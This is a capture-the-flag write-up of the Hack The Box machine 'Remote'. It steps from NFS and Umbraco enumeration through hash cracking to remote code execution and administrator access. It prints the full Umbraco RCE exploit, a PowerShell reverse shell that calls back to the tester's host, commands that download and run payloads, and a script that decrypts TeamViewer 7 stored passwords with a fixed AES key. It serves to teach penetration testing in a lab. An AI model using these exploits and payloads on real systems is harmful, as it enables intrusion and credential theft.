Previous Page

nihilist - 30 / 05 / 2021

Remote Writeup

Introduction :

Remote is an easy Windows box released back in march 2020

Part 1 : Initial Enumeration

As always we begin our Enumeration using Nmap to enumerate opened ports.
We will be using the flags -sC for default scripts and -sV to enumerate versions.

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ nmap -vvv -p- 10.10.10.180 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
Discovered open port 80/tcp on 10.10.10.180
Discovered open port 111/tcp on 10.10.10.180
Discovered open port 135/tcp on 10.10.10.180
Discovered open port 139/tcp on 10.10.10.180
Discovered open port 445/tcp on 10.10.10.180
Discovered open port 21/tcp on 10.10.10.180
Discovered open port 49666/tcp on 10.10.10.180
Discovered open port 49678/tcp on 10.10.10.180
Discovered open port 5985/tcp on 10.10.10.180
Discovered open port 47001/tcp on 10.10.10.180
Discovered open port 49667/tcp on 10.10.10.180
Discovered open port 49665/tcp on 10.10.10.180
Discovered open port 2049/tcp on 10.10.10.180
Discovered open port 49664/tcp on 10.10.10.180

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ nmap -sCV 10.10.10.180 -p 21,80,111,135,445,2049
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-30 18:12 CEST
Nmap scan report for 10.10.10.180
Host is up (0.043s latency).

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
445/tcp  open  microsoft-ds?
2049/tcp open  mountd        1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7m35s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-05-30T16:21:22
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.57 seconds

Part 2 : Getting User Access

Our nmap scan picked up port 21 FTP with anonymous login allowed, We can recursively get what's there with wget :

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ wget -r ftp://anonymous:anonymous@10.10.10.180/

However there are no files to get so we're going to continue exploring port 80 instead:

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ gobuster dir -u http://10.10.10.180 -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.180
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/05/30 18:42:03 Starting gobuster in directory enumeration mode
===============================================================
/Blog                 (Status: 200) [Size: 5001]
/Contact              (Status: 200) [Size: 7880]
/Home                 (Status: 200) [Size: 6703]
/People               (Status: 200) [Size: 6749]
/Products             (Status: 200) [Size: 5338]
/about-us             (Status: 200) [Size: 5451]
/blog                 (Status: 200) [Size: 5011]
/contact              (Status: 200) [Size: 7890]
/home                 (Status: 200) [Size: 6703]
/install              (Status: 302) [Size: 126] [--> /umbraco/]
/intranet             (Status: 200) [Size: 3323]
/master               (Status: 500) [Size: 3420]
/people               (Status: 200) [Size: 6739]
/person               (Status: 200) [Size: 2741]
/product              (Status: 500) [Size: 3420]
/products             (Status: 200) [Size: 5328]
/render/https://www.google.com (Status: 400) [Size: 3420]
/umbraco              (Status: 200) [Size: 4040]

===============================================================
2021/05/30 18:43:05 Finished
===============================================================

Here we see that gobuster picked up the /umbraco/ directory:

Although we don't have credentials to get in yet. Our nmap scan picked up some available NFS shares on port 111, so let's enumerate those using the showmount utility:

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ apt search showmount
Sorting... Done
Full Text Search... Done
nfs-common/kali-rolling,now 1:1.3.4-5 amd64 [installed,automatic]
  NFS support files common to client and server


[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ sudo apt install nfs-common -y
[sudo] password for nothing:
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
nfs-common is already the newest version (1:1.3.4-5).
nfs-common set to manually installed.
0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)

Here we see a mountable folder called site_backups, so let's mount it:

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ mkdir backups

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ sudo mount -t nfs 10.10.10.180:/site_backups backups/

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ ls -lash backups
total 123K
4.0K drwx------ 2 nobody  4294967294 4.0K Feb 23  2020 .
4.0K drwxr-xr-x 4 nothing nothing    4.0K May 30 19:40 ..
 512 drwx------ 2 nobody  4294967294   64 Feb 20  2020 App_Browsers
4.0K drwx------ 2 nobody  4294967294 4.0K Feb 20  2020 App_Data
4.0K drwx------ 2 nobody  4294967294 4.0K Feb 20  2020 App_Plugins
 512 drwx------ 2 nobody  4294967294   64 Feb 20  2020 aspnet_client
 48K drwx------ 2 nobody  4294967294  48K Feb 20  2020 bin
8.0K drwx------ 2 nobody  4294967294 8.0K Feb 20  2020 Config
 512 drwx------ 2 nobody  4294967294   64 Feb 20  2020 css
 512 -rwx------ 1 nobody  4294967294  152 Nov  1  2018 default.aspx
 512 -rwx------ 1 nobody  4294967294   89 Nov  1  2018 Global.asax
4.0K drwx------ 2 nobody  4294967294 4.0K Feb 20  2020 Media
 512 drwx------ 2 nobody  4294967294   64 Feb 20  2020 scripts
8.0K drwx------ 2 nobody  4294967294 8.0K Feb 20  2020 Umbraco
4.0K drwx------ 2 nobody  4294967294 4.0K Feb 20  2020 Umbraco_Client
4.0K drwx------ 2 nobody  4294967294 4.0K Feb 20  2020 Views
 28K -rwx------ 1 nobody  4294967294  28K Feb 20  2020 Web.config

Now here in the files we see that there are some Umbraco directories, and after searching a bit online, we see that there can be a server database in the /App_Data folder named Umbraco.sdf

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ strings backups/App_Data/Umbraco.sdf| grep Administrator
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminAdministratorsCADMOSKTPIURZ:5F7

Here we see that the Administrator user has a hashed password with the SHA1 algorithm, so let's attempt to crack it using john:

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ cat hash.txt
b8be16afba8c314ad33d812f22a04991b90e2aaa

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ john hash.txt --format=Raw-SHA1 -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
baconandcheese   (?)
1g 0:00:00:00 DONE (2021-05-30 19:47) 1.282g/s 12594Kp/s 12594Kc/s 12594KC/s baconandchipies1..bacon918
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed

And we found the Administrator password for Umbraco: baconandcheese, so let's login:

Clicking help at the bottom left corner, we can see the version of this Umbraco instance:

And so we can look for CVEs for that Umbraco version:

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ searchsploit umbraco
------------------------------------------------------- ---------------------------------
 Exploit Title                                         |  Path
------------------------------------------------------- ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit)    | windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execu | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authentica | aspx/webapps/49488.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scrip | php/webapps/44988.txt
------------------------------------------------------- ---------------------------------
Shellcodes: No Results

And we get a few exploits to use for our Umbraco instance! Let's try the first RCE exploit:

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ cp $(locate 46153.py) .

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ cat 46153.py
# Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Gregory DRAPERI & Hugo BOUTINON
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# CVE: N/A


import requests;

from bs4 import BeautifulSoup;

def print_dict(dico):
    print(dico.items());

print("Start");

# Execute a calc for the PoC
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "wget 10.10.14.13/your_rce_attempt_worked!"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "powershell.exe"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ';

login = "admin@htb.local";
password="baconandcheese";
host = "http://10.10.10.180";

# Step 1 - Get Main page
s = requests.session()
url_main =host+"/umbraco/";
r1 = s.get(url_main);
print_dict(r1.cookies);

# Step 2 - Process Login
url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin";
loginfo = {"username":login,"password":password};
r2 = s.post(url_login,json=loginfo);

# Step 3 - Go to vulnerable web page
url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx";
r3 = s.get(url_xslt);

soup = BeautifulSoup(r3.text, 'html.parser');
VIEWSTATE = soup.find(id="__VIEWSTATE")['value'];
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'];
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'];
headers = {'UMB-XSRF-TOKEN':UMBXSRFTOKEN};
data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"};

# Step 4 - Launch the attack
r4 = s.post(url_xslt,data=data,headers=headers);

print("End");%

Make sure you edit the values of login, password, host, powershell.exe and wget tun0/rcetest that i highlighted above, then proceed:

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 46153.py
Start
[]
End

[ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote]
→ sudo python3 -m http.server 80
[sudo] password for nothing:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.180 - - [31/May/2021 06:48:29] code 404, message File not found
10.10.10.180 - - [31/May/2021 06:48:29] "GET /your_rce_attempt_worked! HTTP/1.1" 404 -

And now after testing it we see that we have been able to get the machine to execute the wget command back to us, however noraj made a much better rewrite of this Umbraco RCE python exploit which allows us to pass arguements:

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ wget https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py
--2021-05-31 07:07:53--  https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3202 (3.1K) [text/plain]
Saving to: ‘exploit.py’

exploit.py                                                      100%[======================================================================================================================================================>]   3.13K  --.-KB/s    in 0s

2021-05-31 07:07:53 (6.52 MB/s) - ‘exploit.py’ saved [3202/3202]

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -h
usage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS]

Umbraco authenticated RCE

optional arguments:
  -h, --help                 show this help message and exit
  -u USER, --user USER       username / email
  -p PASS, --password PASS   password
  -i URL, --host URL         root URL
  -c CMD, --command CMD      command
  -a ARGS, --arguments ARGS  arguments

So let's use it:

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command whoami'
iis apppool\defaultapppool

We see that we can get remote code execution as the apppool user,

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command systeminfo'

Host Name:                 REMOTE
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00429-00521-62775-AA801
Original Install Date:     2/19/2020, 4:03:29 PM
System Boot Time:          5/30/2021, 12:07:27 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              4 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [03]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [04]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,745 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 3,426 MB
Virtual Memory: In Use:    1,373 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 5 Hotfix(s) Installed.
                           [01]: KB4534119
                           [02]: KB4462930
                           [03]: KB4516115
                           [04]: KB4523204
                           [05]: KB4464455
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.180
                                 [02]: fe80::108b:625:aa40:7e42
                                 [03]: dead:beef::108b:625:aa40:7e42
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

And we also are able to print out the infos about the server itself, including the current hotfixes. However we first need to get a reverse shell onto the box, let's find where the ftp folder is:

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command ls c:/'


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/20/2020   1:13 AM                ftp_transfer
d-----        2/19/2020   3:11 PM                inetpub
d-----        2/19/2020  11:09 PM                Microsoft
d-----        9/15/2018   3:19 AM                PerfLogs
d-r---        2/23/2020   2:19 PM                Program Files
d-----        2/23/2020   2:19 PM                Program Files (x86)
d-----        5/30/2021  11:07 AM                site_backups
d-r---        2/19/2020   3:12 PM                Users
d-----        2/20/2020  12:52 AM                Windows




[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command ls c:/ftp_transfer'

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command new-item c:/ftp_transfer/test.txt'


    Directory: C:\ftp_transfer


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        5/31/2021   1:45 AM              0 test.txt

And as you can see, we are able to write to the C:\ftp_transfer directory so let's make use of it by first locally creating our powershell script containing our reverse shell payload:

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ vim shell.ps1

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ cat shell.ps1
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.13",9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

This will send a reverse shell connection back to our tun0 interface on port 9001 once we get the box to execute it. In order to do that, we can get this script into the ftp_transfer directory we found earlier:

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command curl http://10.10.14.13:9090/shell.ps1 -o c:/ftp_transfer/shell.ps1'

[ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote]
→ ls -lash shell.ps1
4.0K -rw-r--r-- 1 nothing nothing 482 May 31 07:50 shell.ps1

[ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
10.10.10.180 - - [31/May/2021 07:53:26] "GET /shell.ps1 HTTP/1.1" 200 -

Now that our shell.ps1 got uploaded, let's execute it:

[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command c:/ftp_transfer/shell.ps1'

[ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote]
→ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.180] 49854
whoami
iis apppool\defaultapppool

And we got a reverse shell connection!

# cd c:\users\public
# ls


    Directory: C:\users\public


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        2/19/2020   3:03 PM                Documents
d-r---        9/15/2018   3:19 AM                Downloads
d-r---        9/15/2018   3:19 AM                Music
d-r---        9/15/2018   3:19 AM                Pictures
d-r---        9/15/2018   3:19 AM                Videos
-ar---        5/30/2021  12:08 PM             34 user.txt


# cat user.txt
67XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And we managed to get the user flag!

Part 3 : Getting Root Access

Now in order to privesc to the Administrator user on this box, we're going to run winpeas on the box:

[ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Remote]
→ cp $(locate winPEAS.ps1) .

[ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Remote]
→ ls -lash Invoke-winPEAS.ps1
228K -rw-r--r-- 1 nothing nothing 228K May 31 09:00 Invoke-winPEAS.ps1

[ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Remote]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...

# cd C:\ftp_transfer
# curl http://10.10.14.13:9090/Invoke-winPEAS.ps1 -o peas.ps1

# import-module ./peas.ps1
# Invoke-winPEAS

So here we basically got our winpeas powershell module onto the box, then we imported it which gave us the Invoke-winPEAS command to execute:

Immediately winPEAS found 9 potential CVEs on the box:

However one of the intended privesc paths to follow was the TeamViewer v7 application that's installed on the box:

# cd 'C:\Program Files (x86)\TeamViewer\'
# ls


    Directory: C:\Program Files (x86)\TeamViewer


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        5/31/2021  12:54 AM                Version7

We're going to take advantage of this teamviewer version 7 software to privesc to the Administrator user like how it was described in this blogpost:

First of all, TeamViewer7 stores the password in the registry under the value SecurityPasswordAES and this password is encrypted with AES-128-CBC, with the key set as 0602000000a400005253413100040000 and the Initialization Vector set as 0100010067244F436E6762F25EA8D704, Looking up google a bit, we find that the registry key for TeamViewer is under HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer:

# reg query HKLM\SOFTWARE\Wow6432Node\TeamViewer

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7
# reg query HKLM\SOFTWARE\Wow6432Node\TeamViewer\Version7

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7
    StartMenuGroup    REG_SZ    TeamViewer 7
    InstallationDate    REG_SZ    2020-02-20
    InstallationDirectory    REG_SZ    C:\Program Files (x86)\TeamViewer\Version7
    Always_Online    REG_DWORD    0x1
    Security_ActivateDirectIn    REG_DWORD    0x0
    Version    REG_SZ    7.0.43148
    ClientIC    REG_DWORD    0x11f25831
    PK    REG_BINARY    BFAD2AEDB6C89AE0A0FD0501A0C5B9A5C0D957A4CC57C1884C84B6873EA03C069CF06195829821E28DFC2AAD372665339488DD1A8C85CDA8B19D0A5A2958D86476D82CA0F2128395673BA5A39F2B875B060D4D52BE75DB2B6C91EDB28E90DF7F2F3FBE6D95A07488AE934CC01DB8311176AEC7AC367AB4332ABD048DBFC2EF5E9ECC1333FC5F5B9E2A13D4F22E90EE509E5D7AF4935B8538BE4A606AB06FE8CC657930A24A71D1E30AE2188E0E0214C8F58CD2D5B43A52549F0730376DD3AE1DB66D1E0EBB0CF1CB0AA7F133148D1B5459C95A24DDEE43A76623759017F21A1BC8AFCD1F56FD0CABB340C9B99EE3828577371B7ADA9A8F967A32ADF6CF062B00026C66F8061D5CFF89A53EAE510620BC822BC6CC615D4DE093BC0CA8F5785131B75010EE5F9B6C228E650CA89697D07E51DBA40BF6FC3B2F2E30BF6F1C01F1BC2386FA226FFFA2BE25AE33FA16A2699A1124D9133F18B50F4DB6EDA2D23C2B949D6D2995229BC03507A62FCDAD55741B29084BD9B176CFAEDAAA9D48CBAF2C192A0875EC748478E51156CCDD143152125AE7D05177083F406703ED44DCACCD48400DD88A568520930BED69FCD672B15CD3646F8621BBC35391EAADBEDD04758EE8FC887BACE6D8B59F61A5783D884DBE362E2AC6EAC0671B6B5116345043257C537D27A8346530F8B7F5E0EBACE9B840E716197D4A0C3D68CFD2126E8245B01E62B4CE597AA3E2074C8AB1A4583B04DBB13F13EB54E64B850742A8E3E8C2FAC0B9B0CF28D71DD41F67C773A19D7B1A2D0A257A4D42FC6214AB870710D5E841CBAFCD05EF13B372F36BF7601F55D98ED054ED0F321AEBA5F91D390FF0E8E5815E6272BA4ABB3C85CF4A8B07851903F73317C0BC77FA12A194BB75999319222516
    SK    REG_BINARY    F82398387864348BAD0DBB41812782B1C0ABB9DAEEF15BC5C3609B2C5652BED7A9A07EA41B3E7CB583A107D39AFFF5E06DF1A06649C07DF4F65BD89DE84289D0F2CBF6B8E92E7B2901782BE8A039F2903552C98437E47E16F75F99C07750AEED8CFC7CD859AE94EC6233B662526D977FFB95DD5EB32D88A4B8B90EC1F8D118A7C6D28F6B5691EB4F9F6E07B6FE306292377ACE83B14BF815C186B7B74FFF9469CA712C13F221460AC6F3A7C5A89FD7C79FF306CEEBEF6DE06D6301D5FD9AB797D08862B9B7D75B38FB34EF82C77C8ADC378B65D9ED77B42C1F4CB1B11E7E7FB2D78180F40C96C1328970DA0E90CDEF3D4B79E08430E546228C000996D846A8489F61FE07B9A71E7FB3C3F811BB68FDDF829A7C0535BA130F04D9C7C09B621F4F48CD85EA97EF3D79A88257D0283BF2B78C5B3D4BBA4307D2F38D3A4D56A2706EDAB80A7CE20E21099E27481C847B49F8E91E53F83356323DDB09E97F45C6D103CF04693106F63AD8A58C004FC69EF8C506C553149D038191781E539A9E4E830579BCB4AD551385D1C9E4126569DD96AE6F97A81420919EE15CF125C1216C71A2263D1BE468E4B07418DE874F9E801DA2054AD64BE1947BE9580D7F0E3C138EE554A9749C4D0B3725904A95AEBD9DACCB6E0C568BFA25EE5649C31551F268B1F2EC039173B7912D6D58AA47D01D9E1B95E3427836A14F71F26E350B908889A95120195CC4FD68E7140AA8BB20E211D15C0963110878AAB530590EE68BF68B42D8EEEB2AE3B8DEC0558032CFE22D692FF5937E1A02C1250D507BDE0F51A546FE98FCED1E7F9DBA3281F1A298D66359C7571D29B24D1456C8074BA570D4D0BA2C3696A8A9547125FFD10FBF662E597A014E0772948F6C5F9F7D0179656EAC2F0C7F
    LastMACUsed    REG_MULTI_SZ    \0005056B9A169
    MIDInitiativeGUID    REG_SZ    {514ed376-a4ee-4507-a28b-484604ed0ba0}
    MIDVersion    REG_DWORD    0x1
    ClientID    REG_DWORD    0x6972e4aa
    CUse    REG_DWORD    0x1
    LastUpdateCheck    REG_DWORD    0x5e72893c
    UsageEnvironmentBackup    REG_DWORD    0x1
    SecurityPasswordAES    REG_BINARY    FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B
    MultiPwdMgmtIDs    REG_MULTI_SZ    admin
    MultiPwdMgmtPWDs    REG_MULTI_SZ    357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77
    Security_PasswordStrength    REG_DWORD    0x3

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7\AccessControl
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7\DefaultSettings

We already see it but let's filter to just get the part we want:

# reg query HKLM\SOFTWARE\Wow6432Node\TeamViewer\Version7 /v SecurityPasswordAES

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7
    SecurityPasswordAES    REG_BINARY    FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B

now that we got it, we can use the python script of the aforementionned blog post in order to decrypt the password:

import sys, hexdump, binascii
from Crypto.Cipher import AES

class AESCipher:
    def __init__(self, key):
        self.key = key

    def decrypt(self, iv, data):
        self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return self.cipher.decrypt(data)

key = binascii.unhexlify("0602000000a400005253413100040000")
iv = binascii.unhexlify("0100010067244F436E6762F25EA8D704")
hex_str_cipher = "FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B"      

ciphertext = binascii.unhexlify(hex_str_cipher)

raw_un = AESCipher(key).decrypt(iv, ciphertext)

print(hexdump.hexdump(raw_un))

password = raw_un.decode('utf-16')
print(password)

[ 10.10.14.13/23 ] [ /dev/pts/49 ] [~/HTB/Remote]
→ pip3 install pycryptodome hexdump
Requirement already satisfied: pycryptodome in /home/nothing/.local/lib/python3.9/site-packages (3.10.1)
Requirement already satisfied: hexdump in /home/nothing/.local/lib/python3.9/site-packages (3.3)

[ 10.10.14.13/23 ] [ /dev/pts/49 ] [~/HTB/Remote]
→ python3 decrypt.py
00000000: 21 00 52 00 33 00 6D 00  30 00 74 00 65 00 21 00  !.R.3.m.0.t.e.!.
00000010: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
None
!R3m0te!

And we found the password! Now let's use it with evilWinRM:

[ 10.10.14.13/23 ] [ /dev/pts/49 ] [~/HTB/Remote]
→ evil-winrm -u administrator -p '!R3m0te!' -i 10.10.10.180

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

